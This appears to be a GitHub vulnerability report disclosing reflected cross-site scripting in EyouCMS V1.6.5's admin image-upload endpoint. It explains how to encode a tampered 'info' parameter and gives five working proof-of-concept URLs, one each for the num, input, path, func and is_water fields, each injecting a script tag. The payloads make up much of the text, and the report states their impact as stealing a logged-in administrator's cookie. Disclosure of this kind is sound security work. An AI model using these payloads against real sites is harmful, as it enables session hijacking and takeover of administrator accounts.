You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
EyouCMS-V1.6.5 When uploading images locally, the program will use the info parameter to set the parameters carried by the upload form.
Multiple reflective XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameter it contains to a malicious value.
These parameters are: num,input,path,func,is_water There is no update on github, the latest installation package (V1.6.5) is: https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip
Details
The exploit of this XSS vulnerability is mainly to construct the form to carry parameters, header is directly referenced by <input> into the page.
The info parameter should be replaced with a "+" if it contains a "-" after JWT encryption. The guess is that the developer may have incorrectly implemented the logic of URL encoding and decoding, resulting in accepting only "+" and not "-". This may be because they only consider standard URL encoding rules and ignore URL security encoding rules.
Note: you do not need to carry data when encrypting, just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform url encoding.Don't go in the wrong order, or you'll convert the + to a space.
Summary
EyouCMS-V1.6.5 When uploading images locally, the program will use the info parameter to set the parameters carried by the upload form.
![image](https://private-user-images.githubusercontent.com/66168888/294427512-2c764b74-2d99-42c7-a339-5d7ee84893bb.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0Mjc1MTItMmM3NjRiNzQtMmQ5OS00MmM3LWEzMzktNWQ3ZWU4NDg5M2JiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWI0YzY4OTUwMDk0ZWFkOWM3MTZkNDA2NjlmM2ZmYTVlMjQ4NzkzNzA1ZmViODgyNTUzOTY4ZDJhZmQ5OWI5N2MmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.J2GLHPvxNJ7fRHTRx7FFKTZal-azjreqW_MrOUAgoKA)
Multiple reflective XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameter it contains to a malicious value.
These parameters are:
num
,input
,path
,func
,is_water
There is no update on github, the latest installation package (V1.6.5) is:
https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip
Details
The exploit of this XSS vulnerability is mainly to construct the form to carry parameters, header is directly referenced by
<input>
into the page.The info parameter should be replaced with a "+" if it contains a "-" after JWT encryption. The guess is that the developer may have incorrectly implemented the logic of URL encoding and decoding, resulting in accepting only "+" and not "-". This may be because they only consider standard URL encoding rules and ignore URL security encoding rules.
POC
HEADER:ALGORITHM & TOKEN TYPE:
Note: you do not need to carry data when encrypting, just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform url encoding.Don't go in the wrong order, or you'll convert the + to a space.
In Header, when the
num
parameter causes a reflected XSS vulnerability, the payload is:http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
In Header, when the
![image](https://private-user-images.githubusercontent.com/66168888/294424016-c3703b1c-5048-4b71-8592-37154f6e6e40.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0MjQwMTYtYzM3MDNiMWMtNTA0OC00YjcxLTg1OTItMzcxNTRmNmU2ZTQwLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWI0NmY5MjcxMGI0ZmFhZGM1MTNjZDFhZjcyNzU0YzUxNWQ3MDRlZmRlMzk1ODhmNGQ5YjQ5NzJiZjE5YzI0ZDAmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.ABRf_kulK2iEQvBmXXZxGn6NtgHMw_M8Rx2eMTZT3F8)
![image](https://private-user-images.githubusercontent.com/66168888/294424069-54cf66e7-851f-4c9e-ae92-5731771fb786.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0MjQwNjktNTRjZjY2ZTctODUxZi00YzllLWFlOTItNTczMTc3MWZiNzg2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTEwYzEyZTAxNTg4NTFjZGYyOTE2Y2IyZDlhY2U0NzUwN2NjYjI5ZGEwZWI5NmIwNmMxNTllZWY2YjY1M2EwMzEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.izpGIopPfe27h6WDzoZmhNT0iV-1aLHsiHm1OFQGxUg)
input
parameter causes a reflected XSS vulnerability, the payload is:http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
In Header, when the
![image](https://private-user-images.githubusercontent.com/66168888/294424753-f823013c-2f1b-4ff7-89d8-d4d087fc4b73.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0MjQ3NTMtZjgyMzAxM2MtMmYxYi00ZmY3LTg5ZDgtZDRkMDg3ZmM0YjczLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTdjMzkwNDIxNjAzOGU5OTA1ZTA0MjUwN2ViNDQ1MWUzYjIxNzlkMDZkNmMyYTkyNTNkNTNmOTUxYjBiZjBhZDImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.E6Xo46lOvx7ZkijPXkO6VZ2nVAdVx3UaPUWoCf_dDnw)
![image](https://private-user-images.githubusercontent.com/66168888/294424856-8780b450-b4af-47a2-a8b9-ab6325fef35d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0MjQ4NTYtODc4MGI0NTAtYjRhZi00N2EyLWE4YjktYWI2MzI1ZmVmMzVkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTI2YmMxYjljZTc3MDI5NmUwYzllZmUwNjBiZDcwYjY5ODg0MDFjOTg5MmEzMTVlMDhmMjg2MzFjNzgyYjExZmUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.2eng5bWaDUgs8cB4xZFPmgrV26C4v-TmIVyDvB6N1Us)
path
parameter causes a reflected XSS vulnerability, the payload is:http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
In Header, when the
![image](https://private-user-images.githubusercontent.com/66168888/294424499-b66d332d-d839-4a78-82e1-58b581b6c63f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0MjQ0OTktYjY2ZDMzMmQtZDgzOS00YTc4LTgyZTEtNThiNTgxYjZjNjNmLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTFmZjM5MTEwMDQxMjgzM2UwYTRjOTUzNzYxNmIxZDFiNzA1ZjFhYjg1ZjcwMjI0Mjc1NDdjMTE3NDNmMDY0MjkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.jm3nKl5ioCjR2rJbWafw1rWFxK5-WXa1jhx0_KS81xo)
![image](https://private-user-images.githubusercontent.com/66168888/294424570-3eac7adb-2bed-4615-bf46-68d64516a357.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0MjQ1NzAtM2VhYzdhZGItMmJlZC00NjE1LWJmNDYtNjhkNjQ1MTZhMzU3LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWExNzA4MDdhOTFlZmI3Y2IxOTBhYTdlYTYxNGI1Y2U5MjBhMDRlNmJjMjFiOWJlMDllMTAxMmY0YzQwZDY5NGMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.T1Yo_ufdJ_S0G3RwsVaUtW6kDnVO9UGmQmCFBq5mnKM)
func
parameter causes a reflected XSS vulnerability, the payload is:http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
In Header, when the
![image](https://private-user-images.githubusercontent.com/66168888/294425352-fe40e3d7-fab9-4ace-b72c-90748c51be61.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0MjUzNTItZmU0MGUzZDctZmFiOS00YWNlLWI3MmMtOTA3NDhjNTFiZTYxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWZjZTNmZjJkNDQ3ZWJkYTQzMWRhMWFkMWVhZmE3NDZkOWJiYTFkNmZiNjljZjVmYWE4OGYyZjM3ZWQwOWUxZGUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.fNydbkjhKdP68HAyFL0vesH9ny2Xly4IWKX31CiJKB8)
![image](https://private-user-images.githubusercontent.com/66168888/294425398-94ab81bc-369d-4f72-876f-02f0c43f398c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExOTE3NjUsIm5iZiI6MTcyMTE5MTQ2NSwicGF0aCI6Ii82NjE2ODg4OC8yOTQ0MjUzOTgtOTRhYjgxYmMtMzY5ZC00ZjcyLTg3NmYtMDJmMGM0M2YzOThjLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE3VDA0NDQyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTYzMzFjNDdkNTA2ZGYxODBkZTBhZTI3OTNjOGRkNjQ4OWUzMmZiODBiM2U1MjBiMDAxNGYwOTkxM2QzNzU2YzUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.FCjQoScNGjbwtOEsFPSRPD_XODLOFuHM0sV-xYTkHR0)
is_water
parameter causes a reflected XSS vulnerability, the payload is:http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
Impact
An administrator who is already logged in can have a cookie stolen after accessing the malicious url.
The text was updated successfully, but these errors were encountered: